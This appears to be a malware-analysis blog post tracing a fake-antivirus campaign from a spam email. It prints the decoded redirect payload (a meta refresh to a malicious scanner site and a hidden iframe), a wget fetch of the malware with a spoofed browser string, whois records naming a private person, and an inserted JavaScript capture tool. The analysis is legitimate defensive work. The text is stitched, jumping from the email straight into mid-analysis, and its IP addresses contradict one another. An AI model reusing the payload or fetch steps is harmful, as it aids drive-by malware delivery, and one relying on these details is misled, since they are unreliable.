From: Andres Pratt <email@example.com>
Subject: Vacation Care Payment Program - September 2010
Date: September 20, 2010 3:55:08 PM GMT+02:00
To: mymailinglist-owner@lists.YYYYYY.org
Return-Path: <mailman-bounces@lists.YYYYYY.org>
X-Original-To: aaron@XXXXXX.org
Delivered-To: aaron@XXXXXX.org
X-Policyd-Weight: using cached result; rate:hard: -7.6
Received: from abc.YYYYYY.org (abc.YYYYYY.org [22.214.171.124]) by mailserver.XXXXXX.org (Postfix) with ESMTP id 919B6CE21B0 for <aaron@XXXXXX.org>; Mon, 20 Sep 2010 14:55:19 +0200 (CEST)
Received: from localhost ([127.0.0.1] helo=abc.YYYYYY.org) by abc.YYYYYY.org with esmtp (Exim 4.63) (envelope-from <mailman-bounces@lists.YYYYYY.org>) id 1Oxftv-000581-5y; Mon, 20 Sep 2010 14:55:19 +0200
Received: from [126.96.36.199] (helo=LOSHAZXPVC) by abc.YYYYYY.org with esmtp (Exim 4.63) (envelope-from <firstname.lastname@example.org>) id 1Oxftq-00057e-Ki; Mon, 20 Sep 2010 14:55:17 +0200
Received: from mta003.royalhighgate.com (mta298.royalhighgate.com [188.8.131.52]) by mail.royalhighgate.com (8.13.2+Sun/8.13.9) with ESMTP id 36ij9391558267 for <mymailinglist-owner@lists.YYYYYY.org>; Mon, 20 Sep 2010 15:55:08 +0200
Message-Id: <41060351.52314783258024343.JavaMail.email@example.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_Part_8807_43917428.1091380632604"
X-Spam-Checker-Version: SpamAssassin 3.1.7-deb3 (2006-10-05) on abc.YYYYYY.org
X-Spam-Level: **
X-Spam-Status: No, score=2.9 required=5.0 tests=BAYES_50,HTML_MESSAGE, RCVD_IN_BSP_OTHER,RCVD_IN_PBL,RCVD_IN_SORBS_WEB autolearn=no version=3.1.7-deb3
Sender: mailman-bounces@lists.YYYYYY.org
Errors-To: mailman-bounces@lists.YYYYYY.org
X-Sa-Exim-Connect-Ip: 127.0.0.1
X-Sa-Exim-Mail-From: mailman-bounces@lists.YYYYYY.org
X-Sa-Exim-Scanned: No (on abc.YYYYYY.org); SAEximRunCond expanded to false

HI All,

Attached is the program and payments program for the upcoming vacation care. As I will be absent over this time I trying to ensure all is well organized for the team. Could you please confirm how you wish to pay for the events as listed.
Pic 1: document.write(t7ah);t7ah="";

So we now know that the variable t7ah would be written to the web browser (the DOM tree). The next question is: what is the value of the t7ah variable? Again, the same trick works. A second alert(), this time alert(t7ah);, shows its contents:
PLEASE WAITING.... 4 SECONDS <meta http-equiv="refresh" content="4;url=http://scaner-high.cz.cc/scanner10/?afid=24" /> <iframe width="0" height="0" src="http://finwizonline.com/news/"></iframe>

Obviously the attackers will redirect us again to two new URLs. So we can now take a look at these two domains:
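The alert() trick above, automated: a capture-only stand-in for document.write records what the obfuscated script would have written to the DOM, and the captured HTML is then searched for the meta-refresh and iframe next hops. This is an added example, not code from the original post; the script it runs is constructed here to mimic the staged t7ah writer (with placeholder URLs), and the names captureDocumentWrite(), extractRedirects() and analyse() are this example's own.

```javascript
// Constructed sample, modelled on the t7ah stage described in the post.
// URLs are placeholders, not the ones from the real campaign.
const SAMPLE_SCRIPT = [
  'var t7ah = "";',
  't7ah += "PLEASE WAITING.... 4 SECONDS ";',
  't7ah += "<meta http-equiv=\\"refresh\\" content=\\"4;url=http://redirect.example/scanner/?afid=1\\" />";',
  't7ah += "<iframe width=\\"0\\" height=\\"0\\" src=\\"http://iframe.example/news/\\"></iframe>";',
  'document.write(t7ah); t7ah = "";',
].join('\n');

// Run the script against a fake `document` whose write()/writeln() only
// record their argument. Nothing is rendered, so the payload is never
// interpreted by a browser; this is the alert() trick without the dialog.
function captureDocumentWrite(scriptSource) {
  const written = [];
  const fakeDocument = {
    write: (s) => { written.push(String(s)); },
    writeln: (s) => { written.push(String(s) + '\n'); },
  };
  // new Function keeps the sample out of this module's lexical scope;
  // `window` and `document` are the only names it is handed explicitly.
  new Function('window', 'document', scriptSource)(globalThis, fakeDocument);
  return written.join('');
}

// Pull the next-hop URLs out of the captured HTML: meta refresh targets
// and iframe sources, the two redirect mechanisms the post's payload used.
function extractRedirects(html) {
  const targets = [];
  const metaRe = /<meta\s[^>]*http-equiv=["']?refresh["']?[^>]*content=["']\s*\d+\s*;\s*url=([^"'\s>]+)/gi;
  const iframeRe = /<iframe\s[^>]*src=["']([^"']+)["']/gi;
  let m;
  while ((m = metaRe.exec(html)) !== null) targets.push({ kind: 'meta-refresh', url: m[1] });
  while ((m = iframeRe.exec(html)) !== null) targets.push({ kind: 'iframe', url: m[1] });
  return targets;
}

// Convenience wrapper: captured HTML plus the redirect list for triage.
function analyse(scriptSource) {
  const html = captureDocumentWrite(scriptSource);
  return { html, redirects: extractRedirects(html) };
}

console.log(JSON.stringify(analyse(SAMPLE_SCRIPT), null, 2));
```

Each hop found this way is a candidate for the host/whois lookups that follow; for real samples, run this under a separate, non-privileged interpreter rather than in a browser profile you care about.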
$ host scaner-high.cz.cc
scaner-high.cz.cc has address 184.108.40.206

$ whois 220.127.116.11
% Information related to '18.104.22.168 - 22.214.171.124'
inetnum:        126.96.36.199 - 188.8.131.52
netname:        net-0x2a
descr:          Zharkov Mukola Mukolayovuch
remarks:        Datacentre "0x2a"
country:        UA
org:            ORG-PEZM1-RIPE
admin-c:        ZN210-RIPE
tech-c:         ZN210-RIPE
status:         ASSIGNED PI
mnt-by:         RIPE-NCC-HM-PI-MNT
mnt-lower:      RIPE-NCC-HM-PI-MNT
mnt-by:         ONIK-MNT
mnt-routes:     ONIK-MNT
mnt-domains:    ONIK-MNT
source:         RIPE # Filtered

organisation:   ORG-PEZM1-RIPE
org-name:       Private Entreprise Zharkov Mukola Mukolayovuch
org-type:       OTHER
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
e-mail:         firstname.lastname@example.org
admin-c:        ZN210-RIPE
phone:          +38-044 587-83-16
mnt-ref:        ONIK-MNT
mnt-by:         ONIK-MNT
source:         RIPE # Filtered

person:         Zharkov Nikolay
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
phone:          +38-044 587-83-16
nic-hdl:        ZN210-RIPE
mnt-by:         ONIK-MNT
source:         RIPE # Filtered
% Information related to '184.108.40.206/22AS48587'

Looks suspicious! But for the sake of completeness, let's also first get the iframe from above:
$ host finwizonline.com
finwizonline.com has address 220.127.116.11 (comcast)
finwizonline.com has address 18.104.22.168 (comcast)
finwizonline.com has address 22.214.171.124 (AT&T PPP Pool)
finwizonline.com has address 126.96.36.199 (comcast Boston)
finwizonline.com has address 188.8.131.52 (comcast)

The author could not get any data from the finwizonline.com/news iframe, regardless of which user agent string (IE 6.0, for example) was chosen. Possibly the website had already been taken down. So let us go back to the scaner-high.cz.cc URL:
$ wget -U "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)" \
    "http://scaner-high.cz.cc/scanner10/?afid=24"

This shows us a nice fake Antivirus screen!
$ more index.html\?afid\=24
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en" />
<meta http-equiv="Cache-control" content="Public" />
<title>My Windows Online Scanner</title>
<link rel="icon" href="/assets/5b9c863d//Images/favicon.gif" type="image/gif" />
http://www.virustotal.com/file-scan/report.html?id=de7262bf81a9d791d80986f785c795edf02ac0ba7c39cd89fb9021f8a6228e5f-1284989236

The VirusTotal report shows that this is a rather well-known piece of malware, and it is well detected: 65% of all AV engines detect this fake AV at the time of this writing. The next step would of course be to reverse engineer this malware, but I leave it at that for now. Nothing really new.

So far the author only managed to download the binary .EXE file when the user agent string matched the one shown above. The web server serving the malware runs nginx/0.7.65. As said above, we had to fake the User Agent string to "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)". A very practical tool to fake UA strings is the "UserAgent Switcher" extension for Firefox. This way the author could download the samples from a regular Linux PC.

Fake AV User Experience
Pic 3: a pop-up box appears and warns the user that his computer is "infected". Please note that this screenshot was of course taken on a Linux system so as not to infect the host.

If the user clicks OK here, he is redirected to this page, which looks like a Windows window alerting him of malware:

Pic 4: a web page looking like a regular Windows window. Non-computer-savvy people would fall for this trick.

Finally, if the user clicks on "remove all", he receives a .EXE file called "antivirus.exe", which is the very same binary that we were able to download via wget before.

Author: L. Aaron Kaplan